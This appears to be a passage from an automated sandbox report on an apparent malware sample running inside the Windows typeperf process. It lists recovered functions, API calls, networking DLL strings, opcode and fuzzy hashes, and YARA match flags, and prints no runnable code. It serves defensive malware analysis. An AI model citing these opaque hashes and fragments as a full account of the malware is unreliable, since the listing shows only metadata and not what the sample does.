                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 30055d3e5cbe452b93c5d05c8f14b2a2abba8a436447c0c8796f4178dfce896b
                                                                                                                  • Instruction ID: 7bf652c0a18e07b1af1dd60af1f3373496c9129aa5abe6838424cddeed5be6cc
                                                                                                                  • Opcode Fuzzy Hash: 30055d3e5cbe452b93c5d05c8f14b2a2abba8a436447c0c8796f4178dfce896b
                                                                                                                  • Instruction Fuzzy Hash: 4390023120140813D111B2584644747000A87D4341FD5D412A042555CD97568A52A525
                                                                                                                  Function 03172C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 756bfc0d12896652c9fe6ba7c02dbbd2ddd913814857c7a09b5419ca74a6af51
                                                                                                                  • Instruction ID: 8a22d092ec8477631d6329b2b68140ff47d178a77d35e3bfaa9e4fd07bd09729
                                                                                                                  • Opcode Fuzzy Hash: 756bfc0d12896652c9fe6ba7c02dbbd2ddd913814857c7a09b5419ca74a6af51
                                                                                                                  • Instruction Fuzzy Hash: 5B90023120148C03D110B258854478A000687D4301F99D411A442565CD879589917525
                                                                                                                  Function 03172C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 059f83465ac559fecd6a6cbaf050946f3a751085589e089fb1a441dee9fbb054
                                                                                                                  • Instruction ID: d4040b7f3e6622c6a5e51d2f2db09da971c2185d5236dbca8263b37bb3fe3c0d
                                                                                                                  • Opcode Fuzzy Hash: 059f83465ac559fecd6a6cbaf050946f3a751085589e089fb1a441dee9fbb054
                                                                                                                  • Instruction Fuzzy Hash: 5290023120140C43D100B2584544B86000687E4301F95D016A0125658D8715C9517925
                                                                                                                  Function 03172CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 041d0af523e70d51bf6dd5b73a4583b50a0db8c160e2f78e4c60b3c1e31e78a5
                                                                                                                  • Instruction ID: 96c936c46310f1bc75ab436fb045e9766f97f5aec3f0be1fe5a14148e0175c34
                                                                                                                  • Opcode Fuzzy Hash: 041d0af523e70d51bf6dd5b73a4583b50a0db8c160e2f78e4c60b3c1e31e78a5
                                                                                                                  • Instruction Fuzzy Hash: 2B90023120140803D100B6985548686000687E4301F95E011A5025559EC76589916535
                                                                                                                  Function 005D391A Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 110sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 005D3A3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                  • Opcode ID: 599702c2d308d212020f30f43fb6995ec38f7afe4cc3e7fe1eb951699a8e6e1b
                                                                                                                  • Instruction ID: ad8e0e37a4d4e2d86e8e19da8727e0dd82b45857f384f140e3dcaf7fda5f9395
                                                                                                                  • Opcode Fuzzy Hash: 599702c2d308d212020f30f43fb6995ec38f7afe4cc3e7fe1eb951699a8e6e1b
                                                                                                                  • Instruction Fuzzy Hash: 943120B1601606AFD724EF68C885BEABFA9FB85700F14451BE6595B341D370AB01CBE1
                                                                                                                  Function 005D3970 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 005D3A3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                  • Opcode ID: d852a14c1f9b6ffba18789f0573af0c44ccd0b0faaad6198d3120a42df50235e
                                                                                                                  • Instruction ID: cf5ca078df7bdc7e7b372e9bad3bf882c88b54839c39b3378154f3d49e47286b
                                                                                                                  • Opcode Fuzzy Hash: d852a14c1f9b6ffba18789f0573af0c44ccd0b0faaad6198d3120a42df50235e
                                                                                                                  • Instruction Fuzzy Hash: C53172B1601605BBD724DFA4C885FEBBBBDFB88704F10451EFA196B241D370AA40CBA5
                                                                                                                  Function 005D394C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 102sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 005D3A3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                  • Opcode ID: 47f38d23b4c5959fa3c807aa15ba38bf2a6cac6db8f3f78cc8d79d07ef9bbaaf
                                                                                                                  • Instruction ID: ca6d58503879cf162c4c86a62c4e01823a31285e7fe6a3c2fec22a1e6f91e19b
                                                                                                                  • Opcode Fuzzy Hash: 47f38d23b4c5959fa3c807aa15ba38bf2a6cac6db8f3f78cc8d79d07ef9bbaaf
                                                                                                                  • Instruction Fuzzy Hash: 9231C471601605BBD724DFA8C885FEABBB9FB84714F10451EE6196B340D370A601CB95
                                                                                                                  Function 005D3961 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 100sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 005D3A3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                  • Opcode ID: a97d22ea76f60bfc0fcf1312e80ae3b9c60170d251257ef1849ebc2c08e79969
                                                                                                                  • Instruction ID: 3f2b488ad9711c5edebcb5f7e4479df80d13209602b7bd967d6001c32db9a5ed
                                                                                                                  • Opcode Fuzzy Hash: a97d22ea76f60bfc0fcf1312e80ae3b9c60170d251257ef1849ebc2c08e79969
                                                                                                                  • Instruction Fuzzy Hash: CE318571600606EBD724DFA4C885FEABBB9FB44704F10451EE6196B241D370A641CBE5
                                                                                                                  Function 005B99F0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005B9A32
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2422867632-0
                                                                                                                  • Opcode ID: a46c3382ea94fe69b32f62ebd140d864001b1aa71808ccd2c8c485d2861d0b54
                                                                                                                  • Instruction ID: a559f54a06b6a5edb08bbab5cbfc8a50e63ba413b9ac896e8866d080a1eaf673
                                                                                                                  • Opcode Fuzzy Hash: a46c3382ea94fe69b32f62ebd140d864001b1aa71808ccd2c8c485d2861d0b54
                                                                                                                  • Instruction Fuzzy Hash: 4AF0657334061536E630A1D99C03FD77B8CDBD0BA1F140426F70CEB2C0D591B41142E4
                                                                                                                  Function 005C8040 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,005C1C30,005D7E8E,NU],005C1BF7), ref: 005C8070
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2340568224-0
                                                                                                                  • Opcode ID: e70bfe2937eb28ff350500ec36c00331d2c90a3752268ada29bba58aaf3a434a
                                                                                                                  • Instruction ID: 0a4cfc67886ace45b1b99869262a23f4f60f8b619d4255b535e3199e7d888f84
                                                                                                                  • Opcode Fuzzy Hash: e70bfe2937eb28ff350500ec36c00331d2c90a3752268ada29bba58aaf3a434a
                                                                                                                  • Instruction Fuzzy Hash: CFD05E712807063FF610B6E59D0BF563A8CAB44790F404529B948EB3C2ED65F41045A9
                                                                                                                  Function 03172C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: bd25a62230af5642f71c0676f24b96059d7e626d58ffe02c7b8b4cfe57cf3d8c
                                                                                                                  • Instruction ID: 381b3fc9a724be1063a2ff219f499a43c6624ed67561191bf5412506cdd63b6c
                                                                                                                  • Opcode Fuzzy Hash: bd25a62230af5642f71c0676f24b96059d7e626d58ffe02c7b8b4cfe57cf3d8c
                                                                                                                  • Instruction Fuzzy Hash: D0B09B719015C5C7DA11F7604708717791567D4701F6DC461D3030645E4739C1D2E575